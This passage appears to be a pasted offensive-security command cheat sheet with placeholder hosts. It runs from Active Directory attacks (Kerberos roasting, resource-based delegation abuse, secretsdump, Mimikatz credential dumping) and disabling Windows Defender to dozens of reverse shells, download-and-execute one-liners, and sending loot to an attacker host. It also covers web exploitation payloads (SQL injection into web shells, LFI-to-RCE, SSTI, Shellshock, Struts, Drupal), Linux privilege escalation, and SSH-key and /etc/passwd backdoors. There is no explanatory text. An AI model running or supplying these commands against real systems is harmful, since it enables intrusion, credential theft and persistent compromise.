xp_cmdshell ''whoami'';') AT [LINKED\SERVER] kerbrute userenum -d {{DOMAIN}} --dc {{DC_IP}} {{WORDLIST}} kerbrute userenum -d {{DOMAIN}} --dc {{DC_IP}} /usr/share/seclists/Usernames/Names/names.txt impacket-lookupsid {{DOMAIN}}/guest@{{DC_IP}} -no-pass nxc smb {{DC_IP}} -u guest -p '' 
--rid-brute 10000 nxc smb {{DC_IP}} -u {{USER}} -p {{PASS}} --users username-anarchy -i names.txt > userlist.txt impacket-GetNPUsers {{DOMAIN}}/ -dc-ip {{DC_IP}} -usersfile userlist.txt -no-pass Invoke-UsernameHarvestOWA -ExchHostname {{RHOST}} -Domain {{DOMAIN}} -UserList userlist.txt -OutFile valid.txt echo "{{DC_IP}} {{DC_HOST}} {{DOMAIN}} {{DC_HOST}}.{{DOMAIN}}" | sudo tee -a /etc/hosts sudo ntpdate -u {{DC_IP}} nmap -Pn -p- --min-rate 2000 -sV -sC -oA resourced {{DC_IP}} nxc smb {{DC_IP}} -u '' -p '' --shares nxc smb {{DC_IP}} -u '' -p '' --rid-brute 10000 impacket-lookupsid {{DOMAIN}}/anonymous@{{DC_IP}} -no-pass enum4linux-ng -A -u '' -p '' {{DC_IP}} nxc ldap {{DC_IP}} -u '{{USER}}' -p '{{PASS}}' --query "(objectClass=user)" "sAMAccountName description" nxc smb {{DC_IP}} -u '{{USER}}' -p '{{PASS}}' --shares smbclient \\\\{{DC_IP}}\\"Password Audit" -U '{{DOMAIN}}/{{USER}}%{{PASS}}' impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL nxc winrm {{DC_IP}} -u 'L.Livingstone' -H {{NTHASH}} evil-winrm -i {{DC_IP}} -u L.Livingstone -H {{NTHASH}} bloodhound-python -d {{DOMAIN}} -u L.Livingstone --hashes :{{NTHASH}} -ns {{DC_IP}} -c All --zip impacket-addcomputer -computer-name 'ATTACK$' -computer-pass 'Attack123!' -dc-host {{DC_HOST}} -domain-netbios {{DOMAIN}} '{{DOMAIN}}/L.Livingstone' -hashes :{{NTHASH}} impacket-rbcd -delegate-from 'ATTACK$' -delegate-to 'RESOURCEDC$' -action write -dc-ip {{DC_IP}} '{{DOMAIN}}/L.Livingstone' -hashes :{{NTHASH}} impacket-getST -spn 'cifs/{{DC_HOST}}' -impersonate Administrator -dc-ip {{DC_IP}} '{{DOMAIN}}/ATTACK$:Attack123!' 
export KRB5CCNAME=$(pwd)/Administrator.ccache impacket-secretsdump -k -no-pass {{DC_HOST}}.{{DOMAIN}} -just-dc-user Administrator evil-winrm -i {{DC_IP}} -u Administrator -H {{NTHASH}} DefenderCheck.exe Invoke-Mimikatz.ps1 Set-MpPreference -DisableRealtimeMonitoring $true Add-MpPreference -ExclusionPath 'C:\Windows\Temp' Get-MpComputerStatus | Select RealTimeProtectionEnabled,AntivirusEnabled,IsTamperProtected sc query windefend evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} evil-winrm -i {{RHOST}} -u {{USER}} -H {{NTHASH}} evil-winrm -i {{DC_HOST}} -r {{DOMAIN}} -u {{USER}} evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} -s /opt/scripts/ -e /opt/executables/ evil-winrm -i {{RHOST}} -u {{USER}} -p {{PASS}} -S upload /home/kali/winPEASx64.exe C:\Windows\Temp\winPEAS.exe download C:\Users\{{USER}}\Desktop\proof.txt /home/kali/proof.txt netexec winrm {{RHOST}} -u {{USER}} -p {{PASS}} impacket-psexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} impacket-wmiexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} impacket-smbexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} impacket-secretsdump {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} impacket-secretsdump -just-dc {{DOMAIN}}/{{USER}}:{{PASS}}@{{DC_IP}} impacket-GetNPUsers {{DOMAIN}}/ -dc-ip {{DC_IP}} -usersfile {{WORDLIST}} -no-pass -format hashcat impacket-GetUserSPNs {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} -request -outputfile spns.hash impacket-getST -spn cifs/{{DC_HOST}} -impersonate Administrator {{DOMAIN}}/{{USER}}:{{PASS}} -dc-ip {{DC_IP}} impacket-ntlmrelayx -tf targets.txt -smb2support impacket-atexec {{DOMAIN}}/{{USER}}:{{PASS}}@{{RHOST}} "whoami" impacket-psexec -hashes :{{NTHASH}} {{DOMAIN}}/{{USER}}@{{RHOST}} privilege::debug sekurlsa::logonpasswords sekurlsa::pth /user:{{USER}} /domain:{{DOMAIN}} /ntlm:{{NTHASH}} /run:cmd.exe lsadump::sam lsadump::dcsync /domain:{{DOMAIN}} /user:{{DOMAIN}}\krbtgt kerberos::ptt ticket.kirbi lsadump::lsa /patch sekurlsa::tickets /export rlwrap nc -lvnp {{LPORT}} powershell -nop -W hidden -c 
"$c=New-Object Net.Sockets.TCPClient('{{LHOST}}',{{LPORT}});$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$sb=([Text.Encoding]::ASCII).GetBytes($r+'PS '+(pwd).Path+'> ');$s.Write($sb,0,$sb.Length);$s.Flush()}" powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://{{LHOST}}/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress {{LHOST}} -Port {{LPORT}}" nc.exe {{LHOST}} {{LPORT}} -e cmd.exe IEX(IWR http://{{LHOST}}/Invoke-ConPtyShell.ps1 -UseBasicParsing);Invoke-ConPtyShell {{LHOST}} {{LPORT}} stty raw -echo; (stty size; cat) | nc -lvnp {{LPORT}} msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f exe -o shell.exe msfvenom -p windows/x64/shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} EXITFUNC=thread -f dll -o evil.dll python3 -m http.server 80 impacket-smbserver share ./ -smb2support -username {{USER}} -password {{PASS}} certutil -urlcache -split -f http://{{LHOST}}/nc.exe C:\Windows\Temp\nc.exe powershell -c "Invoke-WebRequest -Uri http://{{LHOST}}/nc.exe -OutFile C:\Windows\Temp\nc.exe" powershell -c "(New-Object Net.WebClient).DownloadFile('http://{{LHOST}}/nc.exe','C:\Windows\Temp\nc.exe')" powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://{{LHOST}}/script.ps1')" bitsadmin /transfer job /download /priority high http://{{LHOST}}/nc.exe C:\Windows\Temp\nc.exe copy \\{{LHOST}}\share\nc.exe C:\Windows\Temp\nc.exe copy C:\Users\victim\loot.zip \\{{LHOST}}\share\loot.zip wget.exe http://{{LHOST}}/nc.exe -O C:\Windows\Temp\nc.exe certutil -encode loot.bin loot.b64 powershell -c "[IO.File]::WriteAllBytes('C:\Windows\Temp\nc.exe',[Convert]::FromBase64String('TVqQAAM...'))" scp loot.zip {{USER}}@{{LHOST}}:/home/{{USER}}/loot.zip python3 -m http.server {{LPORT}} python -m SimpleHTTPServer {{LPORT}} wget http://{{LHOST}}:{{LPORT}}/linpeas.sh -O /tmp/linpeas.sh curl 
http://{{LHOST}}:{{LPORT}}/linpeas.sh -o /tmp/linpeas.sh curl http://{{LHOST}}:{{LPORT}}/linpeas.sh | bash wget -qO- http://{{LHOST}}:{{LPORT}}/linpeas.sh | bash nc -lvnp {{LPORT}} > /tmp/loot.tar nc {{LHOST}} {{LPORT}} < /tmp/loot.tar scp /tmp/loot.tar {{USER}}@{{LHOST}}:/tmp/loot.tar scp {{USER}}@{{RHOST}}:/etc/shadow ./shadow base64 -w0 /tmp/loot.tar echo {{URL}} | base64 -d > /tmp/tool cat < /dev/tcp/{{LHOST}}/{{LPORT}} > /tmp/tool nc -lvnp {{LPORT}} < /tmp/tool php -S {{LHOST}}:{{LPORT}} certutil.exe -urlcache -split -f http://{{LHOST}}:{{LPORT}}/file.exe C:\\Windows\\Temp\\file.exe curl -s 'http://{{RHOST}}:{{RPORT}}/ping?ip=127.0.0.1;id' curl -s 'http://{{RHOST}}:{{RPORT}}/ping?ip=127.0.0.1%7Cid' -G curl -s 'http://{{RHOST}}:{{RPORT}}/api?host=$(id)' --data-urlencode 'host=127.0.0.1 $(id)' curl -s -w '%{time_total}\n' 'http://{{RHOST}}:{{RPORT}}/ping?ip=127.0.0.1;sleep+5' curl -s 'http://{{RHOST}}:{{RPORT}}/ping?ip=127.0.0.1;nslookup+$(whoami).{{LHOST}}' curl -s -G 'http://{{RHOST}}:{{RPORT}}/render' --data-urlencode 'name=${7*7}' --data-urlencode 'name2={{7*7}}' curl -s -G 'http://{{RHOST}}:{{RPORT}}/render' --data-urlencode "name={{config.__class__.__init__.__globals__['os'].popen('id').read()}}" curl -s -G 'http://{{RHOST}}:{{RPORT}}/render' --data-urlencode "name={{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}" curl -s -G 'http://{{RHOST}}:{{RPORT}}/render' --data-urlencode "name={{['id']|filter('system')}}" curl -s -G 'http://{{RHOST}}:{{RPORT}}/render' --data-urlencode "name=<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"id\")}" nc -lvnp {{LPORT}} curl -s 'http://{{RHOST}}:{{RPORT}}/index.php?page=../../../../etc/passwd' curl -s 'http://{{RHOST}}:{{RPORT}}/index.php?page=php://filter/convert.base64-encode/resource=index.php' | base64 -d curl -s 'http://{{RHOST}}:{{RPORT}}/index.php?page=php://filter/read=convert.base64-encode/resource=../config/database.php' | base64 -d curl -s 
'http://{{RHOST}}:{{RPORT}}/index.php?page=php://input&cmd=id' --data-binary '<?php system($_GET["cmd"]); ?>' curl -s 'http://{{RHOST}}:{{RPORT}}/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=id' curl -s -A '<?php system($_GET["c"]); ?>' 'http://{{RHOST}}:{{RPORT}}/' curl -s 'http://{{RHOST}}:{{RPORT}}/index.php?page=/var/log/apache2/access.log&c=id' ssh '<?php system($_GET["c"]); ?>'@{{RHOST}} curl -s 'http://{{RHOST}}:{{RPORT}}/index.php?page=/var/log/auth.log&c=id' curl -s 'http://{{RHOST}}:{{RPORT}}/index.php?page=/proc/self/environ' -A '<?php system($_GET["c"]); ?>' curl -s 'http://{{RHOST}}:{{RPORT}}/index.php?page=http://{{LHOST}}:{{LPORT}}/shell.txt&cmd=id' curl -s 'http://{{RHOST}}:{{RPORT}}/index.php?page=../../../../etc/passwd%00' curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=1'" curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=1' ORDER BY 5-- -" curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=-1' UNION SELECT 1,2,3,4-- -" curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=-1' UNION SELECT 1,version(),current_user(),database()-- -" curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=-1' UNION SELECT 1,table_name,table_schema,4 FROM information_schema.tables-- -" curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=-1' UNION SELECT 1,group_concat(username,0x3a,password),3,4 FROM users-- -" curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=1' AND extractvalue(1,concat(0x7e,(SELECT database())))-- -" curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=1' AND substring(database(),1,1)='a'-- -" curl -s -w '%{time_total}\n' "http://{{RHOST}}:{{RPORT}}/item.php?id=1' AND IF(substring(database(),1,1)='a',sleep(5),0)-- -" curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=-1' UNION SELECT 1,'<?php system($_GET[1]); ?>',3,4 INTO OUTFILE '/var/www/html/sh.php'-- -" curl -s "http://{{RHOST}}:{{RPORT}}/item.php?id=-1' UNION SELECT 1,load_file('/etc/passwd'),3,4-- -" sqlmap -u 'http://{{RHOST}}:{{RPORT}}/item.php?id=1' --batch --dbs sqlmap -r 
request.txt --batch --os-shell msfvenom -p php/reverse_php LHOST={{LHOST}} LPORT={{LPORT}} -f raw -o shell.php curl -s -F 'file=@shell.phtml' 'http://{{RHOST}}:{{RPORT}}/upload.php' curl -s -F 'file=@shell.php.jpg' 'http://{{RHOST}}:{{RPORT}}/upload.php' printf 'GIF89a;\n<?php system($_GET["c"]); ?>' > shell.gif.php curl -s -F 'file=@shell.php;type=image/jpeg' 'http://{{RHOST}}:{{RPORT}}/upload.php' printf 'AddType application/x-httpd-php .jpg\n' > .htaccess curl -s -F 'file=@.htaccess' 'http://{{RHOST}}:{{RPORT}}/upload.php' && curl -s -F 'file=@shell.jpg' 'http://{{RHOST}}:{{RPORT}}/upload.php' curl -s -F 'file=@shell.php%00.jpg' 'http://{{RHOST}}:{{RPORT}}/upload.php' curl -s 'http://{{RHOST}}:{{RPORT}}/uploads/shell.phtml?c=id' find / -perm -4000 -type f 2>/dev/null getcap -r / 2>/dev/null find . -exec /bin/sh -p \; -quit ./bash -p ./python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' ./python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' # via cap_setuid+ep perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh less /etc/profile vi -c ':!/bin/sh' /dev/null LFILE=/etc/passwd; ./cp -f /tmp/evil_passwd "$LFILE" echo 'os.execute("/bin/sh")' > /tmp/x.nse; nmap --script=/tmp/x.nse id; whoami; hostname; uname -a; cat /etc/os-release sudo -l find / -perm -4000 -type f 2>/dev/null find / -perm -2000 -type f 2>/dev/null getcap -r / 2>/dev/null curl -s http://{{LHOST}}:{{LPORT}}/linpeas.sh | sh ./linpeas.sh -a 2>&1 | tee /dev/shm/.lp.txt wget -q http://{{LHOST}}:{{LPORT}}/LinEnum.sh -O /tmp/le.sh && bash /tmp/le.sh -t ./pspy64 -pf -i 1000 find / -writable -type d 2>/dev/null | grep -v proc ls -la /etc/cron* /etc/crontab; cat /etc/crontab; crontab -l 2>/dev/null ss -tlnp 2>/dev/null; netstat -tlnp 2>/dev/null grep -rinE 'password|passwd|pwd|secret|api[_-]?key' /var/www /home /etc /opt 2>/dev/null | head -50 getcap -r / 2>/dev/null getcap -r / 2>/dev/null | grep -iE 
'cap_setuid|cap_setgid|cap_dac_read_search|cap_dac_override|cap_sys_admin|cap_sys_ptrace' /usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' /usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";' /usr/bin/ruby -e 'Process::Sys.setuid(0); exec "/bin/bash"' /usr/bin/node -e 'process.setuid(0); require("child_process").spawn("/bin/bash", {stdio: [0,1,2]})' /usr/bin/gdb -nx -ex 'python import os; os.setuid(0)' -ex '!/bin/bash' -ex quit /usr/bin/python3 -c 'import os; os.setuid(0); os.setgid(0)' /usr/bin/python3 -c 'print(open("/etc/shadow","r").read())' /usr/bin/tar cf /tmp/shadow.tar /etc/shadow && tar xf /tmp/shadow.tar -O /usr/bin/python3 -c 'open("/etc/passwd","a").write("hacker:$1$abc$...:0:0:root:/root:/bin/bash\n")' crontab -l cat /etc/crontab ls -la /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/ /etc/cron.monthly/ cat /etc/cron.d/* grep -rln "" /var/spool/cron/ 2>/dev/null; ls -la /var/spool/cron/crontabs/ 2>/dev/null find / -name "*.sh" -perm -o+w -type f 2>/dev/null echo 'cp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash' >> {{URL}} /tmp/rootbash -p printf '#!/bin/bash\nbash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1\n' > /tmp/overwrite.sh; chmod +x /tmp/overwrite.sh echo 'bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1' > /home/user/overwrite.sh; chmod +x /home/user/overwrite.sh touch /home/loot/--checkpoint=1; touch /home/loot/'--checkpoint-action=exec=sh runme.sh'; printf '#!/bin/sh\ncp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash\n' > /home/loot/runme.sh ./pspy64 -pf -i 1000 wget http://{{LHOST}}:{{LPORT}}/pspy64 -O /tmp/pspy64; chmod +x /tmp/pspy64 id; groups; getent group docker lxd lxc ls -la /var/run/docker.sock; docker version docker run -v /:/mnt --rm -it alpine chroot /mnt sh docker images; docker run -v /:/mnt --rm -it <local_image> chroot /mnt sh docker run --rm -it --privileged --net=host --pid=host -v /:/host alpine chroot /host sh curl -s --unix-socket /var/run/docker.sock 
http://localhost/images/json curl -s -X POST --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image":"alpine","Cmd":["chroot","/host","sh","-c","cp /bin/bash /host/tmp/bash; chmod +s /host/tmp/bash"],"Binds":["/:/host"]}' http://localhost/containers/create lxd init --auto; lxc image import ./alpine.tar.gz --alias myimage lxc init myimage privesc -c security.privileged=true; lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true; lxc start privesc; lxc exec privesc /bin/sh git clone https://github.com/saghul/lxd-alpine-builder.git; cd lxd-alpine-builder; sudo ./build-alpine uname -a; uname -r; arch cat /etc/os-release; cat /etc/issue; lsb_release -a 2>/dev/null ./linux-exploit-suggester.sh perl linux-exploit-suggester-2.pl -k $(uname -r) searchsploit linux kernel <version> privilege escalation searchsploit -m <edb-id>; searchsploit -x <edb-id> gcc exploit.c -o exploit -static; ./exploit gcc -m32 -Wl,--hash-style=both exploit.c -o exploit pkexec --version; ls -l $(which pkexec) gcc -o pwnkit PwnKit.c; ./pwnkit uname -r gcc dirtypipez.c -o dirtypipez; ./dirtypipez $(find / -perm -4000 2>/dev/null | head -1) sudo --version; sudoedit -s '\' $(python3 -c 'print("A"*1000)') make; ./sudo-hax-me-a-sandwich 0 uname -r gcc -pthread dirty.c -o dirty -lcrypt; ./dirty gcc -pthread cowroot.c -o cowroot -lcrypt; ./cowroot sudo -l gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /tmp/preload.c sudo LD_PRELOAD=/tmp/preload.so apache2 gcc -o /tmp/libcustom.so -shared -fPIC /tmp/library_path.c sudo LD_LIBRARY_PATH=/tmp <command> ldd /usr/sbin/apache2 showmount -e {{RHOST}} nmap -sV -p 111,2049 --script=nfs-ls,nfs-showmount,nfs-statfs {{RHOST}} cat /etc/exports mkdir -p /mnt/nfs && mount -t nfs -o vers=3 {{RHOST}}:/EXPORT_PATH /mnt/nfs printf '#include <unistd.h>\nint main(){setuid(0);setgid(0);system("/bin/bash -p");return 0;}' > /mnt/nfs/shell.c && gcc /mnt/nfs/shell.c -o /mnt/nfs/shell -w chown root:root /mnt/nfs/shell && 
chmod 4755 /mnt/nfs/shell /EXPORT_PATH/shell -p cp /bin/bash /mnt/nfs/rootbash && chmod +xs /mnt/nfs/rootbash strings /usr/local/bin/{{USER}}_helper export PATH=/tmp:$PATH echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service && chmod +x /tmp/service echo 'int main(){ setuid(0); setgid(0); system("/bin/bash -p"); return 0; }' > /tmp/cat.c && gcc /tmp/cat.c -o /tmp/cat sudo PATH=/tmp:$PATH /usr/local/bin/{{USER}}_helper find / -perm -4000 -type f 2>/dev/null sudo -l find / -name 'id_rsa' -o -name 'id_ed25519' -o -name '*.pem' -o -name 'id_ecdsa' 2>/dev/null find / -name 'authorized_keys' 2>/dev/null -exec ls -la {} \; ssh-keygen -t ed25519 -f ./pwn -N '' echo 'ssh-ed25519 AAAA...attacker pwn' >> /root/.ssh/authorized_keys chmod 600 ./found_key && ssh -i ./found_key {{USER}}@{{RHOST}} ssh2john ./found_key > key.hash && john --wordlist={{WORDLIST}} key.hash ls -l /tmp/ssh-*/agent.* 2>/dev/null; env | grep SSH_AUTH_SOCK SSH_AUTH_SOCK=/tmp/ssh-XXXX/agent.1234 ssh-add -l SSH_AUTH_SOCK=/tmp/ssh-XXXX/agent.1234 ssh {{USER}}@{{RHOST}} cat ~/.ssh/known_hosts /home/*/.ssh/known_hosts 2>/dev/null; cat ~/.ssh/config /home/*/.ssh/config 2>/dev/null grep -rIE 'BEGIN (OPENSSH|RSA|EC|DSA) PRIVATE KEY' / 2>/dev/null | head sudo -l sudo -ln sudo -V | head -1 sudo /bin/bash -p sudo -u root /usr/bin/find . 
-exec /bin/sh \; -quit sudo /usr/bin/vim -c ':!/bin/sh' sudo /usr/bin/awk 'BEGIN {system("/bin/sh")}' sudo /usr/bin/python3 -c 'import os; os.system("/bin/bash")' printf '#include <stdlib.h>\n#include <unistd.h>\n#include <stdio.h>\nvoid _init(){unsetenv("LD_PRELOAD");setgid(0);setuid(0);system("/bin/bash -p");}' > /tmp/shell.c && gcc -fPIC -shared -nostartfiles -o /tmp/shell.so /tmp/shell.c sudo LD_PRELOAD=/tmp/shell.so /usr/sbin/apache2 sudo LD_LIBRARY_PATH=/tmp /usr/sbin/somebinary sudo -u#-1 /usr/bin/id sudoedit -s '\' $(python3 -c 'print("A"*1000)') ./pspy64 -pf -i 1000 find / -perm -4000 -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null find / -perm -2000 -type f 2>/dev/null find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null /usr/bin/find . -exec /bin/sh -p \; -quit cp=$(command -v cp); $cp --no-preserve=mode,ownership /tmp/rootbash /tmp/x 2>/dev/null; bash -p ./suid_binary strings /path/to/suid_binary ltrace /path/to/suid_binary 2>&1 echo '#!/bin/bash\nbash -p' > /tmp/service; chmod +x /tmp/service; export PATH=/tmp:$PATH; /path/to/suid_binary ldd /path/to/suid_binary gcc -shared -fPIC -o /tmp/libcustom.so /tmp/inject.c strace -f -e trace=open,openat,access /path/to/suid_binary 2>&1 | grep -iE 'ENOENT|\.so' systemctl list-units --type=service --all systemctl list-timers --all find /etc/systemd/ /lib/systemd/ /usr/lib/systemd/ /run/systemd/ -name '*.service' -o -name '*.timer' 2>/dev/null | xargs ls -la 2>/dev/null find /etc/systemd/ /lib/systemd/ /usr/lib/systemd/ -writable -type f 2>/dev/null grep -r 'ExecStart' /etc/systemd/system/ 2>/dev/null systemctl cat <service>.service printf '[Service]\nType=oneshot\nExecStart=/bin/bash -c "cp /bin/bash /tmp/rootbash; chmod 4755 /tmp/rootbash"\n[Install]\nWantedBy=multi-user.target\n' > {{URL}} systemctl daemon-reload; systemctl restart <service>.service /tmp/rootbash -p sudo systemctl TF=$(mktemp).service; printf 
'[Service]\nType=oneshot\nExecStart=/bin/sh -c "id > /tmp/output"\n[Install]\nWantedBy=multi-user.target' > $TF; sudo systemctl link $TF; sudo systemctl enable --now $TF printf '[Unit]\nDescription=evil\n[Timer]\nOnCalendar=*-*-* *:*:00\nUnit=evil.service\n[Install]\nWantedBy=timers.target\n' > /etc/systemd/system/evil.timer cat /etc/crontab; ls -la /etc/cron.d/ /etc/cron.daily/ ./pspy64 -pf -i 1000 echo 'bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1' > /path/backup/shell.sh cd /path/backup && touch ./--checkpoint=1 && touch ./'--checkpoint-action=exec=sh shell.sh' cd /path/backup && echo 'sh shell.sh' > runme.sh && touch './--checkpoint-action=exec=sh runme.sh' && touch ./--checkpoint=1 echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > /path/backup/x.sh cd /path/src && touch ./'-e sh shell.sh' cd /path/dir && touch ./--reference=/path/to/owned_file && touch attacker_target cd /path/dir && touch ./--reference=/path/world_writable_perm_file nc -lvnp {{LPORT}} ls -la /etc/passwd /etc/shadow find /etc/passwd /etc/shadow /etc/group -writable 2>/dev/null openssl passwd -1 -salt abc {{PASS}} openssl passwd -6 {{PASS}} echo 'hacker:$1$abc$<HASH>:0:0:root:/root:/bin/bash' >> /etc/passwd su hacker echo 'root::0:0:root:/root:/bin/bash' > /tmp/p; awk 'NR==1{print "root::0:0:root:/root:/bin/bash"} NR>1' /etc/passwd openssl passwd -6 -salt xyz {{PASS}} sed -i 's#^root:[^:]*#root:$6$xyz$<HASH>#' /etc/shadow su root unshadow /etc/passwd /etc/shadow > /tmp/unshadow.txt john --wordlist={{WORDLIST}} /tmp/unshadow.txt nc -lvnp {{LPORT}} rlwrap nc -lvnp {{LPORT}} bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1 bash -c 'bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1' 0<&196;exec 196<>/dev/tcp/{{LHOST}}/{{LPORT}}; sh <&196 >&196 2>&196 nc {{LHOST}} {{LPORT}} -e /bin/bash ncat {{LHOST}} {{LPORT}} -e /bin/bash rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc {{LHOST}} {{LPORT}} > /tmp/f ncat --ssl {{LHOST}} {{LPORT}} -e /bin/bash python -c 'import 
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{{LHOST}}",{{LPORT}}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")' python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{{LHOST}}",{{LPORT}}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")' perl -e 'use Socket;$i="{{LHOST}}";$p={{LPORT}};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' php -r '$sock=fsockopen("{{LHOST}}",{{LPORT}});exec("/bin/sh -i <&3 >&3 2>&3");' ruby -rsocket -e'f=TCPSocket.open("{{LHOST}}",{{LPORT}}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' socat TCP:{{LHOST}}:{{LPORT}} EXEC:'/bin/bash',pty,stderr,setsid,sigint,sane socat file:`tty`,raw,echo=0 TCP-LISTEN:{{LPORT}} socat OPENSSL:{{LHOST}}:{{LPORT}},verify=0 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect {{LHOST}}:{{LPORT}} > /tmp/s; rm /tmp/s openssl s_server -quiet -key key.pem -cert cert.pem -port {{LPORT}} nc -lvnp {{LPORT}} -e /bin/bash rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -lvnp {{LPORT}} > /tmp/f python -c 'import pty; pty.spawn("/bin/bash")' python3 -c 'import pty; pty.spawn("/bin/bash")' stty raw -echo; fg stty -a stty rows {{USER}} cols {{PASS}} export TERM=xterm export SHELL=/bin/bash script -qc /bin/bash /dev/null /usr/bin/script -qc /bin/bash /dev/null socat file:`tty`,raw,echo=0 TCP-LISTEN:{{LPORT}} socat TCP:{{LHOST}}:{{LPORT}} EXEC:'bash -li',pty,stderr,setsid,sigint,sane python3 -c 'import pty,os;os.environ["TERM"]="xterm";pty.spawn("/bin/bash")' expect -c 'spawn /bin/bash; interact' searchsploit apache 2.4.49 searchsploit -x linux/remote/50383.txt searchsploit -m windows/remote/42315.py nmap -p- -sV 
--version-all -oN nmap-full-{{RHOST}}.txt {{RHOST}} hydra -L users.txt -P {{WORDLIST}} -f {{RHOST}} -s {{RPORT}} http-get /manager/html msfvenom -p java/jsp_shell_reverse_tcp LHOST={{LHOST}} LPORT={{LPORT}} -f war -o shell.war curl -u {{USER}}:{{PASS}} -T shell.war "{{URL}}/manager/text/deploy?path=/shell" curl -u {{USER}}:{{PASS}} "{{URL}}/manager/text/undeploy?path=/shell" println new ProcessBuilder('bash','-c','bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1').redirectErrorStream(true).start().text curl -k -u {{USER}}:{{PASS}} "{{URL}}/script" --data-urlencode "script=def p='id'.execute();println(p.text)" nmap -p {{RPORT}} --script http-shellshock --script-args uri=/cgi-bin/status,cmd=id {{RHOST}} curl -H "User-Agent: () { :;}; echo; echo; /bin/bash -c 'id'" {{URL}}/cgi-bin/status curl -H "User-Agent: () { :;}; /bin/bash -c 'bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1'" {{URL}}/cgi-bin/status curl -s '{{URL}}/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=id' --data 'form_id=user_pass&_triggering_element_name=name' curl -s '{{URL}}/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' --data 'form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id' curl -i '{{URL}}/' -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#cmd='id').(#p=new java.lang.ProcessBuilder(new java.lang.String[]{'/bin/bash','-c',#cmd})).(#p.redirectErrorStream(true)).(#proc=#p.start()).(#out=@org.apache.commons.io.IOUtils@toString(#proc.getInputStream())).(#resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')).(#resp.getWriter().println(#out))}" smbmap -H {{RHOST}} -u anonymous smbclient //{{RHOST}}/share -U "./=`nohup bash -c 'bash -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1'`" msfconsole -q -x "use exploit/multi/samba/usermap_script; set RHOSTS {{RHOSTS}}; set LHOST {{LHOST}}; set LPORT 